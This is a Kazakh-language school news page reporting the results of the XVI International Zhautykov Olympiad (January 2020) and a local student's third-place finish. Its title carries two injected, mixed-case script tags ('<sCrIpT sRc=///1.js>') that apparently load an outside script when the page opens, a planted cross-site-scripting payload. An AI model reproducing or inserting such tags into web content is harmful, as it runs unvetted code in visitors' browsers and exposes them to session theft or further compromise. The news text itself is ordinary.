2020 жылдың 8-14 қаңтар аралығында математика, физика және информатика пәндеріне арналған XVI халықаралық Жәутіков олимпиадасының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.01.2020

2020 жылдың  8-14 қаңтар  күндері аралығында Алматы қаласы,
О.А.Жәутіков атындағы республикалық мамандандырылған физика-математика орта мектеп-интернатының базасында математика, физика және информатика пәндеріне арналған XVI халықаралық Жәутіков  олимпиадасының қорытынды кезеңі өткізілді. 

XVI халықаралық Жәутіков  олимпиадасының мақсаты: жаратылыстану-математика бағытындағы математика, физика және информатика пәндері бойынша дарынды балаларды қолдау мен дамыту.

Олимпиадаға 21 елден оның ішінде Қазақстан, Әзірбайжан, Армения, Дания, Норвегия, Ресей, Түркия, Украина сондай-ақ Швеция және т.б. мемлекеттерден  барлығы 599 оқушы қатысты.

Ақмола облысының намысын 2 оқушы қорғады. Солардың ішінде Көкшетау қаласы, «Білім-инновация» лицей-интернатының 10 сынып оқушысы  Даминов Арслан ІІІ орын иегері атанды. 

Жүлдегерімізді шын жүректен құттықтаймыз!

Просмотров: 484


Пікір қосу



Деректерді қолтаңбаға қосу